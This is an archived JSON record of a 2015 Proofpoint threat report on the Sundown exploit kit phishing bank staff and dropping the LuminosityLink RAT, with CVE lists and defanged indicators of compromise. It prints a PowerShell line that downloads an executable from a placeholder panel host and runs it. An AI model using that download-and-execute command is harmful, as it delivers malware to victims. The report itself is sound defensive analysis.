{
	"id": "6ebb1d79-e87c-4186-8a5f-d63676117445",
	"created_at": "2026-04-06T00:17:30.432209Z",
	"updated_at": "2026-04-10T13:11:48.468873Z",
	"deleted_at": null,
	"sha1_hash": "50faeb89cdb2033d5b9a41d81b317efb7505b17c",
	"title": "Sundown EK Spreads LuminosityLink RAT | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 378587,
	"plain_text": "Sundown EK Spreads LuminosityLink RAT | Proofpoint US\r\nBy June 25, 2015 Proofpoint Staff\r\nPublished: 2015-06-25 · Archived: 2026-04-05 21:25:13 UTC\r\nThe Sundown exploit kit is a recent addition to the field of EKs [1], and analysis indicates that it is still in development by\r\nits creator [2]. As it continues to evolve and develop, Proofpoint researchers have detected it distributing a new remote\r\naccess Trojan (RAT).\r\nThis campaign targeted recipients at large banks and financial services organizations. Proofpoint researchers observed both\r\nattachments and URLs being used by the campaign; one of the more widely distributed examples employed a “breaking\r\nnews” template and a malicious URL. (Fig. 1)\r\nFigure 1: Phishing email containing “breaking news” and malicious links.\r\nThe fake news update delivered by the phishing email is false but combines sensationalism with popular suspicion of banks\r\nto effectively entice recipients to click. However, in a departure from the targeting techniques we have described elsewhere,\r\nrather than connect to a TDS that checks for specific client attributes before pulling in the exploit kit, in this case the link\r\nconnects the client directly to the Sundown EK. Sundown does not attempt to distinguish between countries, IP addresses,\r\ncompanies, or other client attributes, and instead attempts to execute exploits on clients indiscriminately. Moreover, the\r\n“unsubscribe” and “report as spam” links in the phishing message also link to the Sundown EK. While it is not unusual to\r\nhave multiple malicious URLs in a single message, the fact that these link directly to the EK, rather than to a TDS or spam\r\nsite, only increases the risk posed by this message.\r\nThe exploits being served by Sundown in this campaign include the Adobe Flash zero-days that were detected on the Angler\r\nEK in early 2015 and reflect a preference for Flash player exploits and broadly applicable Windows vulnerabilities. (Fig. 2)\r\nCVE Platform\r\nCVE-2015-\r\n0311\r\nAdobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X\r\nand through 11.2.202.438 on Linux\r\nhttps://www.proofpoint.com/us/threat-insight/post/Light-After-Dark\r\nPage 1 of 3\n\nCVE-2015-\r\n0313\r\nUse-after-free vulnerability in Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before\r\n16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux\r\nCVE-2015-\r\n0359\r\nDouble free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169\r\non Windows and OS X and before 11.2.202.457 on Linux\r\nCVE-2014-\r\n0556\r\nHeap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152\r\non Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and\r\nOS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK \u0026\r\nCompiler before 15.0.0.249\r\nCVE-2014-\r\n6332\r\n.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and\r\nR2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT\r\nGold and 8.1\r\nCVE-2012-\r\n1876\r\nMicrosoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in\r\nmemory\r\nFigure 2: Exploits observed in Sundown EK (Aditya K. Sood \u0026 Rohit Bansal [2])\r\nThe exploits observed in the Sundown EK changed significantly in a relatively short period, adding another Flash\r\nvulnerability (patched in April) and an Internet Explorer vulnerability from 2012. These changes demonstrate that the actors\r\nbehind the Sundown EK continue to adjust and refine their exploit combinations in order to achieve the best results.\r\nThe exploits are delivered in PHP and SWF files that include the code to exploit the targeted vulnerabilities. Many of the\r\nPHP files are encoded with VBScript encoder (VBS to VBE). The structure of exploit-serving URLs is shown below; long\r\nURL and file names are used and may differ in other samples:\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/lat45786547685457864375643875jhgfhf4\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/1464875454kj5hgkj45h4j35f4j3f5hj35fg4\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/311875648754y5tg4jkh5fg45hjf43hgj5f43\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/17896968796549876986jhgkjhkg65hj5gf6\r\n[hxxp://\u003csundown_panel\u003e/ERFREERGYHIRYTUIYTUEIRHJTRJIHURJHRTRTIEUUEYREUI/145328452345324683274632yjetguyjkgfj\r\nOne of the PHP files is a VBScript file that utilizes PowerShell to download and execute the payload using code such as:\r\n(New-Object System.Net.WebClient).DownloadFile('[hxxp:// \u003csundown_panel\u003e/SDDS/domain.php?d=Service-3.exe]', $env:APPDATA + '\\EDWEDRFEDDF-3.exe');\r\n$val = $env:APPDATA + '\\EDWEDRFEDDF-3.exe';\r\nStart-Process $val;\r\nThe reliance on Powershell limits Sundown’s ability to execute on Windows XP systems – a rare break for a platform that\r\ncontinues to be widely used despite no longer being supported by Microsoft.\r\nPrevious analyses have observed the Sundown EK delivering the Neutrino DDoS bot. In this campaign, Proofpoint\r\nresearchers detected a new payload: the Luminosity Link remote access Trojan (RAT). The stated purpose of\r\nLuminosityLink is ostensibly benign: \"LuminosityLink allows system administrators to manage a large amount of\r\ncomputers concurrently. Our product is ideal for business owners, educational institutions, and Windows system\r\nadministrators.” (Fig. 3)\r\nhttps://www.proofpoint.com/us/threat-insight/post/Light-After-Dark\r\nPage 2 of 3\n\nFigure 3: LuminosityLink features described on product web site ([hxxps://luminosity[.]link/])\r\nAnalysis upon install, however, reveals a very aggressive key logger that injects its code in almost every running process on\r\nthe computer, and multiple attempts are made if not initially successful. This \"injection\" behavior is aggressive even by the\r\nstandard of the Zeus family: very few malware families exhibit such an aggressive behavior, and it is particularly unusual to\r\nobserve this in key loggers, even commercial ones. We have observed LuminosityLink being used to download additional\r\npayloads. It is possible that the actors involved here are using LuminosityLink as a platform to collect information from the\r\nvictim, and using that information to decide whether to deploy more sophisticated malware at high-value targets. While it is\r\nnot unusual for adware and other questionable software to pass themselves off as legitimate tools, it is striking to see a piece\r\nof software with a set of obviously malicious functions to be marketed so actively and openly.\r\nThis unusual ploy becomes somewhat more intelligible in the context of the recent conviction and sentencing of the\r\nBlackshades RAT author and associates: by actively marketing their \"solution\" as a tool with legitimate business and\r\nadministrative uses, the LuminosityLink creators could be attempting to forestall legal action, although this argument is\r\ncertainly not helped by distributing the RAT via an exploit kit.\r\nThe recent rise of Sundown shows that the EK market continues to evolve in the void left by the collapse of the Blackhole\r\nEK, as malware creators experiment with different approaches to delivering exploits and challenge the dominance of\r\nsophisticated, high-value EKs such as Angler. This may also be a sign that the malicious macro campaigns that have\r\ndominated the threat landscape since late 2015 are beginning to be play out and attackers are starting to look for other\r\ndelivery and masking techniques: time and additional observation with tell.\r\nIndicators of Compromise\r\nLuminosityLink C2 server URL:\r\n[hxxp://emenike[.]no-ip-biz]\r\n[hxxp://serv[.]textme.pw]\r\nReferences\r\n1. http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html\r\n2. https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-Beta-BE\r\nSource: https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark\r\nhttps://www.proofpoint.com/us/threat-insight/post/Light-After-Dark\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark"
	],
	"report_names": [
		"Light-After-Dark"
	],
	"threat_actors": [],
	"ts_created_at": 1775434650,
	"ts_updated_at": 1775826708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/50faeb89cdb2033d5b9a41d81b317efb7505b17c.pdf",
		"text": "https://archive.orkl.eu/50faeb89cdb2033d5b9a41d81b317efb7505b17c.txt",
		"img": "https://archive.orkl.eu/50faeb89cdb2033d5b9a41d81b317efb7505b17c.jpg"
	}
}